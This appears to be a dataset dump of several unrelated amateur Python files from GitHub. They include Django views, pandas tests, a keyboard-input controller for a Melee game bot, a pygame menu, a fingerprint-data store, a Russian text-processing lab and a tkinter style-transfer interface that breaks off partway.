print(del_id)\n from .models import employee\n employee.objects.filter(id=del_id).delete()\n emp = employee.objects.all()\n return render(request,\"index.html\",{\"pro\":emp})\n\ndef updatedetails(request):\n id = int(request.GET.get(\"update_id\"))\n e2 = employee.objects.filter(id=id).update()\n print(id)\n print(e2)\n e3=employee.objects.filter(id=id).values()\n print(e3)\n return render(request,\"index.html\",{\"no\":id})","repo_name":"prasadnaidu1/django","sub_path":"real7/app7/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"17533275611","text":"from pandas.api.types import CategoricalDtype\nfrom preprocessing.src.feature_engineering import (\n add_first_time_user,\n clean_data,\n hips_to_bins,\n main,\n remove_unrequired_entries,\n)\n\nfrom pypely import pipeline\n\n\ndef test_main(mocker, data_snippet):\n mocker.patch(\"preprocessing.src.feature_engineering.load_data\", return_value=data_snippet)\n\n main()\n\n\ndef test_clean_data(data_snippet):\n to_test = clean_data(data_snippet)\n\n expected_category_columns = [\"bra_size\", \"category\", \"cup_size\", \"fit\", \"quality\", \"shoe_size\", \"shoe_width\"]\n category_type = [is_type_category(to_test, col) for col in expected_category_columns]\n assert all(category_type)\n\n\ndef test_add_first_time_user(data_snippet):\n to_test = pipeline(\n clean_data,\n add_first_time_user,\n )(data_snippet)\n\n assert \"first_time_user\" in to_test.columns\n\n\ndef test_hips_to_bins(data_snippet):\n to_test = hips_to_bins(data_snippet)\n\n assert is_type_category(to_test, \"hips\")\n assert has_no_NaN_entries(to_test, \"hips\")\n\n\ndef test_remove_unrequired_entries(data_snippet):\n to_test = remove_unrequired_entries(data_snippet)\n expected_removed_columns = [\"waist\", \"bust\", \"user_name\"]\n column_not_in_to_test = [not has_column(to_test, col) for col in expected_removed_columns]\n\n assert has_no_NaN_entries(to_test, \"height\")\n assert has_no_NaN_entries(to_test, \"length\")\n assert has_no_NaN_entries(to_test, \"quality\")\n assert all(column_not_in_to_test)\n\n\ndef has_column(df, col):\n return col in df.columns\n\n\ndef has_no_NaN_entries(to_test, col):\n return sum(to_test[col].isnull()) == 0\n\n\ndef is_type_category(df, column):\n return type(df[column].dtype) == CategoricalDtype\n","repo_name":"stoney95/pypely","sub_path":"examples/preprocessing/tests/test_feature_engineering.py","file_name":"test_feature_engineering.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"36"} +{"seq_id":"8418183650","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 2 23:01:11 2020\n\n@author: wobee\n\"\"\"\n\nimport ctypes\nfrom gym import spaces\nfrom enum import IntEnum\nclass Button(IntEnum):\n A = 0\n B = 1\n X = 2\n Z = 3\n L = 4\n UP = 5\n DOWN = 6\n LEFT = 7\n RIGHT =8 \n C_UP = 9\n C_DOWN = 10\n C_LEFT = 11\n C_RIGHT = 12\n\nKEYBOARD_MAPPING = {\n Button.A: 0x1E, # a key on keyboard\n Button.B: 0x30, # b key on keyboard\n Button.X: 0x2D, # x key on keyboard\n Button.Z: 0x2C, # z key on keyboard\n Button.L: 0x26, # l key on keyboard\n Button.UP: 0xC8, # up\n Button.DOWN: 0xD0, # down\n Button.LEFT: 0xCB, # left\n Button.RIGHT: 0xCD, # right\n Button.C_UP: 0x14, # t\n Button.C_LEFT: 0x21, # f\n Button.C_RIGHT: 0x23, # h\n Button.C_DOWN: 0x22 # g\n}\n\n# Keyboard event hexcode\nKEYEVENTF_SCANCODE = 0x0008 # 
Code for detecting when key is pressed\nKEYEVENTF_KEYUP = 0x0002\n\n# Function to simulate keyboard/mouse inputs\nSendInput = ctypes.windll.user32.SendInput\n\n# C structures used with SendInput\nPUL = ctypes.POINTER(ctypes.c_ulong)\nclass KeyBdInput(ctypes.Structure):\n _fields_ = [(\"wVk\", ctypes.c_ushort),\n (\"wScan\", ctypes.c_ushort),\n (\"dwFlags\", ctypes.c_ulong),\n (\"time\", ctypes.c_ulong),\n (\"dwExtraInfo\", PUL)]\n\nclass HardwareInput(ctypes.Structure):\n _fields_ = [(\"uMsg\", ctypes.c_ulong),\n (\"wParamL\", ctypes.c_short),\n (\"wParamH\", ctypes.c_ushort)]\n\nclass MouseInput(ctypes.Structure):\n _fields_ = [(\"dx\", ctypes.c_long),\n (\"dy\", ctypes.c_long),\n (\"mouseData\", ctypes.c_ulong),\n (\"dwFlags\", ctypes.c_ulong),\n (\"time\",ctypes.c_ulong),\n (\"dwExtraInfo\", PUL)]\n\nclass Input_I(ctypes.Union):\n _fields_ = [(\"ki\", KeyBdInput),\n (\"mi\", MouseInput),\n (\"hi\", HardwareInput)]\n\nclass Input(ctypes.Structure):\n _fields_ = [(\"type\", ctypes.c_ulong),\n (\"ii\", Input_I)]\n\ndef press_key(key):\n assert key in KEYBOARD_MAPPING\n hexKeyCode = KEYBOARD_MAPPING[key]\n extra = ctypes.c_ulong(0)\n ii_ = Input_I()\n ii_.ki = KeyBdInput(0, hexKeyCode, KEYEVENTF_SCANCODE, 0, ctypes.pointer(extra))\n x = Input(ctypes.c_ulong(1), ii_)\n SendInput(1, ctypes.pointer(x), ctypes.sizeof(x))\n\ndef release_key(key):\n assert key in KEYBOARD_MAPPING\n hexKeyCode = KEYBOARD_MAPPING[key]\n extra = ctypes.c_ulong(0)\n ii_ = Input_I()\n ii_.ki = KeyBdInput(0, hexKeyCode, KEYEVENTF_SCANCODE | KEYEVENTF_KEYUP, 0, ctypes.pointer(extra))\n x = Input(ctypes.c_ulong(1), ii_)\n SendInput(1, ctypes.pointer(x), ctypes.sizeof(x))\n\nBUTTONS = (Button.A, Button.B, Button.X, Button.Z, Button.L, Button.UP, Button.DOWN, Button.LEFT, Button.RIGHT, Button.C_UP, Button.C_DOWN, Button.C_LEFT, Button.C_RIGHT)\nfrom time import sleep\nclass KeyBoard():\n def __init__(self):\n self.state = [False for _ in range(len(BUTTONS))]\n\n def press_button(self, button):\n press_key(button)\n self.state[button] = True\n\n\n def release_button(self, button):\n release_key(button)\n self.state[button] = False\n\n def get_action_space(self):\n n_spaces = len(BUTTONS)\n return spaces.MultiBinary(n_spaces)\n \n def send_inputs(self, actions):\n for i, action in enumerate(actions):\n self.process_action(i,action)\n # print(self.state[i], bool(action))\n # if self.process_action(i,action):\n # print('\\tUpdated', self.state[i])\n # print()\n \n \n def process_action(self, button_index, action):\n if self.state[button_index] == bool(action):\n return False\n else:\n # sleep(.05)\n # print(BUTTONS[button_index])\n if bool(action):\n self.press_button(BUTTONS[button_index])\n else:\n self.release_button(BUTTONS[button_index])\n return True\n","repo_name":"wobeert/Melee-Bot","sub_path":"gym-melee/gym_melee/envs/Controllers/KeyBoard.py","file_name":"KeyBoard.py","file_ext":"py","file_size_in_byte":4096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"5843851117","text":"import cx_Freeze\r\nimport sys\r\nimport os\r\n\r\nos.environ['TCL_LIBRARY'] = \"C:\\\\python\\\\tcl\\\\tcl8.6\"\r\nos.environ['TK_LIBRARY'] = \"C:\\\\python\\\\tcl\\\\tk8.6\"\r\n\r\nbase = None\r\n\r\nif sys.platform == 'win32':\r\n base = \"WIN32GUI\"\r\n\r\n\r\nexecutables = [cx_Freeze.Executable(\"Chem1101_Lab_Support.py\",base=base,icon=\"icon.ico\")]\r\n\r\ncx_Freeze.setup(\r\n name = \"Chem1101_Lab_Support\",\r\n options = 
{\"build_exe\":{\"packages\":[\"tkinter\"],\"include_files\":[os.path.join('C:\\python','DLLs','tk86t.dll'),os.path.join('C:\\python','DLLs','tcl86t.dll'),\"icon.ico\",\"image1.png\",\"image2.png\",\"image3.png\",\"image4.png\",\"image5.png\",\"image6.png\"]}},\r\n version = \"0.1\",\r\n description = \"Chem1101 Lab application\",\r\n executables = executables\r\n )\r\n","repo_name":"Samuelczhu/Chem1101-Lab-Support","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"16379736298","text":"from math import inf\n\nfrom .utils import divisible\n\nclass ParameterList:\n \"\"\"\n Prepresents a product of a list and a dictionary.\n keys(), values() and items() all return from both list and dict part\n keeps order\n \"\"\"\n\n def __init__(self, args, kwargs):\n self.args = list(args)\n self.kwargs = dict(kwargs)\n\n def keys(self):\n yield from range(len(self.args))\n yield from sorted(self.kwargs.keys())\n\n def values(self):\n yield from self.args\n for k in sorted(self.kwargs.keys()):\n yield self.__getitem__(k)\n\n def items(self):\n yield from enumerate(self.args)\n yield from sorted(self.kwargs.items())\n\n def append(self, value):\n self.args.append(value)\n\n def extend(self, list_arg):\n self.args.extend(list_arg)\n\n def update(self, arg, overwrite=True):\n\n if not overwrite:\n if isinstance(arg, ParameterList):\n args = arg.args\n kwargs = arg.kwargs\n elif isinstance(arg, Sequence):\n args = arg\n kwargs = {}\n elif isinstance(arg, Mapping):\n args = []\n kwargs = arg\n\n assert not any(kwargs.keys() for k in self.keys()), \\\n 'Parameterlists with common keyword argument cannot be combined'\n\n self.extend(args)\n self.kwargs.update(kwargs)\n\n else:\n raise NotImplementedError()\n\n def get(self, key, default=None):\n if key in self.keys():\n return self[key]\n else:\n return default\n\n def __iter__(self):\n return self.values()\n\n @staticmethod\n def _test_slice(key):\n if key.start == None:\n raise KeyError('Start cannot be None!')\n if key.stop == None:\n raise KeyError('Stop cannot be None!')\n if key.step != None:\n raise KeyError('Step must be None!')\n\n @classmethod\n def from_dict(cls, dict_arg):\n return cls.from_items(dict_arg.items())\n\n @classmethod\n def from_items(cls, items):\n num_items = []\n kwargs = {}\n for k,v in items:\n if type(k) == int:\n num_items.append((k,v))\n elif type(k) == str:\n kwargs[k] = v\n else:\n raise KeyError('Key must be str or int.')\n num_items.sort()\n\n if num_items:\n indices, args = zip(*num_items)\n else:\n indices = args = ()\n\n assert tuple(range(len(indices))) == indices, \\\n 'integer keys must have all integers from 0 to n'\n return cls(args, kwargs)\n\n def __getitem__(self, key):\n if type(key) == int:\n return self.args[key]\n elif type(key) == str:\n return self.kwargs[key]\n else:\n raise ValueError('Invalid index/key type: %s' % type(key))\n\n def __setitem__(self, key, val):\n if type(key) == int:\n self.args[key] = val\n elif type(key) == str:\n self.kwargs[key] = val\n else:\n raise ValueError('Only str and int are valied keys.')\n\n def __str__(self):\n args_str = map(str, self.args)\n kwargs_str = ('%s=%s' % item for item in self.kwargs.items())\n return ', '.join([*args_str, *kwargs_str])\n\n def __len__(self):\n return len(self.args) + len(self.kwargs)\n\n \"\"\"def __repr__(self):\n args_str = map(repr, self.args)\n kwargs_str = ('%s=%r' % item for item in 
self.kwargs.items())\n params = ', '.join([*args_str, *kwargs_str])\n return '%s(%s)' % (self.__class__.__name__, params)\"\"\"\n\n def __lshift__(self, arg):\n if type(arg) == ParameterList:\n self.extend(arg.args)\n self.update(arg.kwargs, overwrite=False)\n else:\n self.append(arg)\n\n\nclass Interval:\n \"\"\"Used to represent a discrete or continous range of values.\"\"\"\n\n def __init__(self, start, stop, step, left_closed=True, right_closed=False):\n assert start < stop\n assert step >= 0\n self.start = start\n self.stop = stop\n self.step = step\n self.left_closed = left_closed\n self.right_closed = right_closed\n\n @property\n def bounded(self):\n return self.start > -inf and self.stop < inf\n\n @property\n def closed(self):\n return self.left_closed or self.right_closed\n\n def __contains__(self, arg):\n start, stop, step = self.start, self.stop, self.step\n\n if isinstance(arg, (int, float)):\n if not (start <= arg <= stop):\n return False\n if arg == start :\n return self.left_closed\n if arg == stop and not self.right_closed:\n return False\n if step == 0:\n return True\n return divisible(arg - start, step)\n\n if isinstance(arg, Intervall):\n if not (arg.start in self and arg.stop in self):\n return False\n if step == 0:\n return True\n if arg.step < step:\n return False\n raise NotImplementedError()\n\n return False\n\n def __getitem__(self, key):\n # TODO: make step actually more meaningfull\n if not type(key) is slice:\n raise KeyError(key)\n\n start = self.start if key.start is None else key.start\n stop = self.stop if key.stop is None else key.stop\n step = self.step if key.step is None else key.step\n left_closed = False if start == -inf else self.step or self.left_closed\n right_closed = False if stop == inf else self.step or self.right_closed\n\n # check types\n for s in (start, stop, step):\n if type(s) not in {int, float}:\n raise KeyError('Start and Stop must be Numbers!')\n\n return Interval(\n start, stop, step, left_closed, right_closed)\n\n def __iter__(self):\n if self.step == 0:\n raise NotIterableError('Continuous interval cannot be iterated.')\n if not self.bounded:\n raise Warning('Iteration of infinite %s will take forever.' 
% self)\n raise NotImplementedError()\n\n if self.left_closed:\n yield self.start\n\n values = iter(range(self.start, self.stop, self.step))\n next(values) # skip start value\n for val in values:\n yield val\n\n # how to avoid floating point arithmetics erros here\n if self.left_closed and val + self.step == self.stop:\n return self.stop\n\n def len(self):\n # TODO check for one element intervals\n if self.step == 0 or not self.bounded:\n return inf\n bounds = self.left_closed + self.right_closed\n return self.stop - self.start - bounds\n\n def __str__(self):\n # return 'Interval(%s, %s, %s)' % (self.start, self.stop, self.type_)\n stop, start, step = self.stop, self.start, self.step\n\n return '{name}{left}{start}:{stop}{step}{right}'.format(\n name = 'Cont' if step == 0 else 'Disc',\n left = '[' if self.left_closed else '(',\n start = '-∞' if start == -inf else start,\n stop = '∞' if stop == inf else stop,\n step = '' if step in {0,1} else ':%s' % step,\n right = ']' if self.right_closed else ')',\n )\n\n\n# --------------- Predifined Domains ---------------------------------------- #\n\nN = Interval(\n start = 1,\n stop = inf,\n step = 1,\n left_closed = True,\n right_closed = False)\n\nN0 = Interval(\n start = 0,\n stop = inf,\n step = 1,\n left_closed = True,\n right_closed = False)\n\nZ = Interval(\n start = -inf,\n stop = inf,\n step = 1,\n left_closed = False,\n right_closed = False,)\n\nR = Interval(\n start = -inf,\n stop = inf,\n step = 0,\n left_closed = False,\n right_closed = False,)\n\n\n# -------------------------- Errors ----------------------------------------- #\n\nclass NotIterableError(Exception):\n pass\n","repo_name":"Mome/baumschule","sub_path":"baumschule/core/domains.py","file_name":"domains.py","file_ext":"py","file_size_in_byte":8066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"10860749443","text":"import pygame\nimport buttons\nimport main\nimport pick_background\nimport redraw_window\n\npygame.init()\n\nscreen_x = 1280 # Screen dimension x\nscreen_y = 720 # Screen dimension y\nwindow = pygame.display.set_mode((screen_x, screen_y))\n\nbg = pygame.image.load('background/dragon_ball_z_bg.png') # Importing background image\nplay_btn_img = pygame.image.load('background/btn/play_btn_red.png')\nquit_btn_img = pygame.image.load('background/btn/exit_btn_red.png')\nplay_btn_toggle_img = pygame.image.load('background/btn/play_btn_yellow.png')\nquit_btn_toggle_img = pygame.image.load('background/btn/exit_btn_yellow.png')\n\nwidth = 300\nheight = 95\nplay_btn = buttons.button(screen_x / 2 - width / 2 - 200, screen_y / 2 - height / 2 - 50, width, height, (0, 0, 255), '', play_btn_img)\nquit_btn = buttons.button(screen_x / 2 - width / 2 + 200, screen_y / 2 - height / 2 - 50, width, height, (0, 0, 255), '', quit_btn_img)\ndim_screen = pygame.Surface((screen_x, screen_y)).convert_alpha()\ndim_screen.fill((0, 0, 0, 130))\n\nmenu = True\nbackground = True\n\npygame.mixer.music.load('sound/dragon_ball_bg.mp3')\npygame.mixer.music.set_volume(0.15)\npygame.mixer.music.play(-1)\n\nhover_btn = pygame.mixer.Sound('sound/hover_btn.wav')\nplay_1 = True\nplay_2 = True\n\nwhile menu:\n window.blit(bg, (0, 0))\n #window.blit(dim_screen, (0, 0))\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n menu = False\n if menu:\n play_btn.draw(window, False)\n quit_btn.draw(window, False)\n pos = pygame.mouse.get_pos()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if play_btn.is_over(pos):\n 
pick_background.pick_background(window)\n if pick_background.exit_game:\n menu = False\n else:\n main.game_loop()\n if main.game_quit:\n menu = False\n if quit_btn.is_over(pos):\n menu = False\n\n if event.type == pygame.MOUSEMOTION:\n if play_btn.is_over(pos):\n if play_1:\n hover_btn.play()\n play_1 = False\n play_btn.image = play_btn_toggle_img\n elif not play_btn.is_over(pos):\n play_1 = True\n play_btn.image = play_btn_img\n if quit_btn.is_over(pos):\n if play_2:\n hover_btn.play()\n play_2 = False\n quit_btn.image = quit_btn_toggle_img\n elif not play_btn.is_over(pos):\n play_2 = True\n quit_btn.image = quit_btn_img\n pygame.display.update()\n\npygame.quit()\n\n","repo_name":"Ace5584/DragonBall-Combat-Game","sub_path":"DragonBallCombatGame/start_menue.py","file_name":"start_menue.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"18322451772","text":"import fingerprint_object\n\nclass FingerprintData():\n \n fingers = []\n \n def __init__(self):\n self.readFromFile('Data.txt')\n \n def isRegistered(self, pId):\n for i in self.fingers:\n if i.visitorId == pId:\n return i.image\n return 0\n \n def writeFingerprint(self, pVisitorId, pImage):\n newObject = fingerprint_object.FingerprintObject()\n newObject.visitorId = pVisitorId\n newObject.image = pImage\n self.fingers.append(newObject)\n self.writeToFile('Data.txt')\n \n def writeToFile(self, pFilePath):\n \n with open(pFilePath, 'w') as f:\n for _object in self.fingers:\n f.write(str(_object.visitorId) + '\\n')\n for _row in _object.image:\n f.write(str(int.from_bytes(_row, byteorder = 'big')) + '\\n')\n f.write('%%ObjectEnd%%' + '\\n')\n \n def readFromFile(self, pFilePath):\n \n count = 0\n lineIndex = 0\n newObject = fingerprint_object.FingerprintObject()\n with open(pFilePath) as f:\n for _line in f:\n if lineIndex == 0:\n newObject.image = []\n newObject.visitorId = _line.rstrip()\n lineIndex += 1\n else:\n if _line.rstrip() == '%%ObjectEnd%%':\n self.fingers.append(newObject)\n newObject = fingerprint_object.FingerprintObject()\n lineIndex = 0\n else:\n newObject.image.append(int(_line.rstrip()).to_bytes(128, byteorder = 'big'))\n lineIndex += 1\n \n \n \n","repo_name":"HWRmeetsTierpark/HWRTP-device-interface","sub_path":"FingerprintSensor/fingerprint_data.py","file_name":"fingerprint_data.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"75156389864","text":"# Кузнецов Денис ИУ7-13Б\r\n# Программa для выполнения некоторых операций с текстом\r\n\r\n\r\nfrom def_fool import check_int_number, check_material_number,\\\r\n delete_leading_spaces\r\n\r\n\r\ndef menu():\r\n print('1. Выровнять текст по левому краю\\n\\\r\n2. Выровнять текст по правому краю\\n\\\r\n3. Выровнять текст по ширине\\n\\\r\n4. Удаление заданного слова\\n\\\r\n5. Замена одного слова другим во всём тексте\\n\\\r\n6. Вычисление арифметических выражений для операций умножение и деление\\n\\\r\n7. 
Предложение с максимальным количеством слов, в котором гласные \\\r\nчередуются с согласными.')\r\n\r\n\r\ndef print_text(text):\r\n for row in text:\r\n print(row)\r\n \r\ndef text_align_left():\r\n global text\r\n n = len(text)\r\n for i in range(n):\r\n text[i] = ' '.join(text[i].split())\r\n print(text[i])\r\n \r\ndef text_align_right():\r\n global text\r\n n = len(text)\r\n max_item = 0\r\n if n > 0:\r\n max_count = len(text[0])\r\n else:\r\n max_count = 0\r\n for i in range (1,n):\r\n if len(text[i]) > max_count:\r\n max_count = len(text[i])\r\n max_item = i\r\n for i in range (n):\r\n text[i] = ' '.join(text[i].split())\r\n text[i] = (' '*(max_count - len(text[i]))+text[i])\r\n print(text[i])\r\n\r\ndef text_align_width():\r\n global text\r\n n = len(text)\r\n max_item = 0\r\n if n > 0:\r\n max_count = len(text[0])\r\n else:\r\n max_count = 0\r\n for i in range (1,n):\r\n if len(text[i]) > max_count:\r\n max_count = len(text[i])\r\n max_item = i\r\n for i in range (n):\r\n text[i] = delete_leading_spaces(text[i])\r\n now = max_count - len(text[i])\r\n zn = text[i].count(' ')\r\n if zn == 0:\r\n print(text[i])\r\n continue\r\n remainder = now % zn\r\n ch = now // zn + 1\r\n str_now = ''\r\n for j in text[i].split():\r\n str_now += j + ' '*ch\r\n if remainder:\r\n str_now += ' '\r\n remainder -= 1\r\n str_now = delete_leading_spaces(str_now)\r\n text[i] = str_now\r\n print(str_now)\r\n \r\ndef delete_word(text):\r\n word = input('Введите слово, которое нужно удалить: ')\r\n length_word = len(word)\r\n for i in range(len(text)):\r\n flag = 1\r\n while flag:\r\n for j in range(len(text[i]) - length_word + 1):\r\n if text[i][j:j+length_word] == word:\r\n if j == 0 and j + length_word == len(text[i]):\r\n text[i] = text[i].replace(text[i][j:j+length_word], '', 1)\r\n flag = 1\r\n break\r\n elif j > 0 and j + length_word == len(text[i]):\r\n if text[i][j-1] == ' ':\r\n text[i] = text[i].replace(text[i][j-1:j+length_word], '', 1)\r\n flag = 1\r\n break\r\n elif text[i][j-1] == '(':\r\n text[i] = text[i].replace(text[i][j:j+length_word], '', 1)\r\n flag = 1\r\n break\r\n elif j == 0 and j + length_word < len(text[i]):\r\n if text[i][j + length_word] in ' ,.;:!?)':\r\n text[i] = text[i].replace(text[i][j:j+length_word+1], '', 1)\r\n flag = 1\r\n break\r\n else:\r\n if text[i][j-1] == ' ' and text[i][j+length_word] in ' ,.;:!?)':\r\n text[i] = text[i].replace(text[i][j-1:j+length_word], '', 1)\r\n flag = 1\r\n break\r\n elif text[i][j-1] == '(' and text[i][j+length_word] in ' ,.;:!?)':\r\n text[i] = text[i].replace(text[i][j:j+length_word], '', 1)\r\n flag = 1\r\n break\r\n else:\r\n flag = 0\r\n \r\ndef change_word(text):\r\n word = input('Введите слово, которое хотите заменить: ')\r\n new_word = input('Введите слово, на которое нужно заменить старое: ')\r\n flag = 1\r\n length_word = len(word)\r\n for i in range(len(text)):\r\n flag = 1\r\n while flag:\r\n for j in range(len(text[i]) - length_word + 1):\r\n if text[i][j:j+length_word] == word:\r\n if j == 0 and j + length_word == len(text[i]):\r\n text[i] = text[i].replace(text[i][j:j+length_word], new_word + ' ', 1)\r\n flag = 0\r\n break\r\n elif j > 0 and j + length_word == len(text[i]):\r\n if text[i][j-1] == ' ':\r\n text[i] = text[i].replace(text[i][j-1:j+length_word], ' ' + new_word, 1)\r\n flag = 0\r\n break\r\n elif text[i][j-1] == '(':\r\n text[i] = text[i].replace(text[i][j:j+length_word], ' ' + new_word, 1)\r\n flag = 0\r\n break\r\n elif j == 0 and j + length_word < len(text[i]):\r\n if text[i][j + length_word] in ' 
,.;:!?)':\r\n text[i] = text[i].replace(text[i][j:j+length_word+1], new_word + ' ', 1)\r\n flag = 0\r\n break\r\n else:\r\n if text[i][j-1] == ' ' and text[i][j+length_word] in ' ,.;:!?)':\r\n text[i] = text[i].replace(text[i][j-1:j+length_word], ' '+new_word, 1)\r\n flag = 0\r\n break\r\n elif text[i][j-1] == '(' and text[i][j+length_word] in ' ,.;:!?)':\r\n text[i] = text[i].replace(text[i][j:j+length_word], ' '+new_word, 1)\r\n flag = 0\r\n break\r\n else:\r\n flag = 0\r\n\r\n\r\ndef delim(a):\r\n if a==' ':\r\n return True\r\n return False\r\n\r\ndef process_op(r,l,op):\r\n if op=='+':\r\n return r+l\r\n if op=='-':\r\n return l-r\r\n if op=='*':\r\n return r*l\r\n if op=='/':\r\n if r == 0:\r\n return \"ERROR\"\r\n return l/r\r\n if op=='%':\r\n return l%r\r\n\r\ndef priority(a):\r\n if a in ['+','-']:\r\n return 1\r\n if a in ['*','/','%']:\r\n return 2\r\n return -1\r\n\r\ndef calculation(s):\r\n st =[]\r\n op = []\r\n t = len(s)\r\n i = 0\r\n while i < t:\r\n if delim(s[i]):\r\n i += 1\r\n continue\r\n if s[i]=='(':\r\n op.append('(')\r\n elif s[i]==')':\r\n while op[-1]!='(':\r\n u = process_op(st[-1],st[-2],op[-1])\r\n st.pop()\r\n st.pop()\r\n st.append(u)\r\n op.pop()\r\n op.pop()\r\n elif s[i] in ['*','/']:\r\n curop=s[i]\r\n f=priority(curop)\r\n while op!=[] and priority(op[-1])>=f:\r\n u = process_op(st[-1],st[-2],op[-1])\r\n st.pop()\r\n st.pop()\r\n st.append(u)\r\n op.pop()\r\n op.append(curop)\r\n else:\r\n operand=s[i]\r\n while i+1 max_count:\r\n max_count = temp_count\r\n search_sentence = temp_sentence\r\n temp_sentence = ''\r\n temp_count = 0\r\n\r\n elif temp_word[len(temp_word)-1] == ',;:':\r\n if check_vowels_consonants(temp_word[:len(temp_word)-1]):\r\n temp_count += 1\r\n \r\n else:\r\n if check_vowels_consonants(temp_word):\r\n temp_count += 1\r\n \r\n if not flag:\r\n flag = 1\r\n else:\r\n temp_sentence += temp_word + ' '\r\n \r\n print(search_sentence) \r\n \r\nlength = float('-inf') \r\ntext = ['Я Октябрь уж Я наступил — уж роща отряхает Я',\r\n 'Последние 2*2*2/ 5 листы. с 2 + 2 нагих своих ветвей;',\r\n 'Дохнул осенний хлад — дорога промерзает',\r\n 'Журча еще бежит за мельницу ручей,',\r\n '2 *2 * 2. Но пруд уже застыл; сосед мой поспешает',\r\n 'В отъезжие поля. 
амам мама олол лол с охотою своей рор оро вав ава оло оло оло оло оло оло оло ,',\r\n 'И страждут озими от бешеной забавы,',\r\n 'И будит лай собак уснувшие дубравы.',\r\n '',\r\n 'lksdjf']\r\n\r\nfor i in range(len(text)):\r\n if len(text[i]) > length:\r\n length = len(text[i])\r\n\r\nmenu()\r\nx = 0\r\nprint_text(text)\r\nwhile x != -1:\r\n x = input('Введите номер функции: ')\r\n while not check_int_number(x):\r\n x = input('Введите номер функции: ')\r\n x = int(x)\r\n if x == 1:\r\n text_align_left()\r\n elif x == 2:\r\n text_align_right()\r\n elif x == 3:\r\n text_align_width()\r\n elif x == 4:\r\n delete_word(text)\r\n elif x == 5:\r\n change_word(text)\r\n elif x == 6:\r\n count_expression(text)\r\n elif x == 7:\r\n find_max_words(text)\r\n else:\r\n print('Неверно введен номер функции!')\r\n \r\n\r\n\r\n","repo_name":"Denis926178/Python","sub_path":"lab11.py","file_name":"lab11.py","file_ext":"py","file_size_in_byte":12412,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"25967679157","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jun 8 19:18:55 2021\r\n\r\n@author: ghaith\r\n\"\"\"\r\nfrom numpy import *\r\nfrom tkinter import *\r\nimport tkinter\r\nfrom tkinter import filedialog\r\nimport cv2 as cv\r\nfrom PIL import ImageTk,Image\r\nimport os\r\nimport matplotlib.pyplot as plt\r\nimport tensorflow as tf\r\nimport tensorflow_hub as hub\r\nimport numpy as np\r\nimport IPython.display as display\r\nimport functools\r\nimport PIL.Image\r\n\r\nroot = Tk()\r\nroot.title(\"artistic style\")\r\nroot.minsize(width=300,height=340)\r\nroot.geometry(\"905x1280\")\r\nsame=True\r\nn=0.5\r\ni=1\r\n# Adding a background image\r\nbackground_image =Image.open(r\"C:\\Users\\ghaith\\Desktop\\Artistic style project\\interface\\photo_2021-06-08_19-35-10.jpg\")\r\n[imageSizeWidth, imageSizeHeight] = background_image.size\r\n\r\nnewImageSizeWidth = int(imageSizeWidth*n)\r\nif same:\r\n newImageSizeHeight = int(imageSizeHeight*n) \r\nelse:\r\n newImageSizeHeight = int(imageSizeHeight/n) \r\n#m1=Image.open(\"4.jpg\") \r\nbackground_image = background_image.resize((newImageSizeWidth,newImageSizeHeight),Image.ANTIALIAS)\r\nimg = ImageTk.PhotoImage(background_image)\r\n#Canvas1 = Canvas(root)\r\n#Canvas1.create_image(300,340,image = img) \r\n#Canvas1.config(bg=\"white\",width = newImageSizeWidth, height = newImageSizeHeight)\r\n#Canvas1.pack(expand=True,fill=BOTH)\r\n\r\nl1=Label(root,image=img)\r\nl1.grid(rowspan=905, columnspan=newImageSizeWidth)\r\n#headingFrame1 = Frame(root,bg=\"#FFBB00\",bd=5)\r\n#headingFrame1.place(relx=0.2,rely=0.1,relwidth=0.6,relheight=0.16)\r\n#headingLabel = Label(headingFrame1, text=\"Welcome to \\n artistic style\", bg='black', fg='white', font=('Courier',15))\r\n#headingLabel.place(relx=0,rely=0, relwidth=1, relheight=1)\r\nbtn1 = Button(root,text=\"Add Your photo\",bg='black', fg='white',command=lambda:addphoto())\r\nbtn1.place(relx=0.65,rely=0.3, relwidth=0.3,relheight=0.1)\r\n \r\nbtn2 = Button(root,text=\"select a style\",bg='black', fg='white',command=lambda:addstyle())\r\nbtn2.place(relx=0.65,rely=0.4, relwidth=0.3,relheight=0.1)\r\n \r\nbtn3 = Button(root,text=\"start transform\",bg='black', fg='white',command=lambda:bb(i))\r\nbtn3.place(relx=0.65,rely=0.5, relwidth=0.3,relheight=0.1)\r\n\r\nbtn4 = Button(root,text=\"print image\",bg='black', fg='white',command=lambda:printer1())\r\nbtn4.place(relx=0.65,rely=0.6, relwidth=0.3,relheight=0.1)\r\n\r\nbtn5 = Button(root,text=\"close 
